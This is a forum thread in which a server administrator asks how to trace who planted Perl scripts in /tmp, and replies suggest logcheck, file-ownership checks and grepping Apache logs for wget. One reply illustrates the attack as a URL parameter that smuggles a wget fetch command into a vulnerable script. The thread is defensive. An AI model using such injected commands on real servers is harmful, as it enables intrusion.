how to track hacker?
Hi,
I keep seeing files like "extrupator.pl" in my tmp folder which are attempts to hack the server.
I think they are uploaded through a site which has a vunerable script, but I am not sure what commands to run to catch this little sod.
What lines should i run to find out who uploaded/ran extrupator.pl?
u could replace the script with one that logs there IP and
as well as the hostname it was ran through (i think that can be done) that should help u find themmake sure it emails it to an off site email address tho....
Alex A. Smith MCP
Wired Network LTD Managing Director
that would be cool, where would i get such a script?
You might try logcheck.
http://www.astro.uiuc.edu/~r-dass/logcheck/
That looks good but the actual link to the script is a dead one,
http://www.psionic.com/abacus/logcheck
If you are using phpSuExec, then determining the vulnerable site is easy.
If you aren't, it's harder.
If you are, run
ls -la file.pl
That should tell you the owner of the file.
Then goto /usr/local/apache/domlogs/ and run
grep wget `ls | grep username`
This should then show all instances where attempts to wget a file were logged. This is usually a good indication of a vulnerable script, usually something like
index.php?x=wget bad file
What you do with the site from there is up to you.
If you don't use phpSuExec, then you can run the following, please note that this command can be load intensive and take a while to run
grep filename.pl *.com
If no results, proceed to other TLD's on your machine, ex
grep filename.pl *.net
That will show you instances where most likely the file was wget'ed, and can also determine the site, yet again, what to do with is up to you.
HTH,
Ben
Sorry about the bad link. Try: http://linux.maruhn.com/sec/logcheck.html
If using rpm there are also links for those packages.
ThanksOriginally posted by edewing
Sorry about the bad link. Try: http://linux.maruhn.com/sec/logcheck.html
If using rpm there are also links for those packages.
LinkBack URL
About LinkBacks
Reply With Quote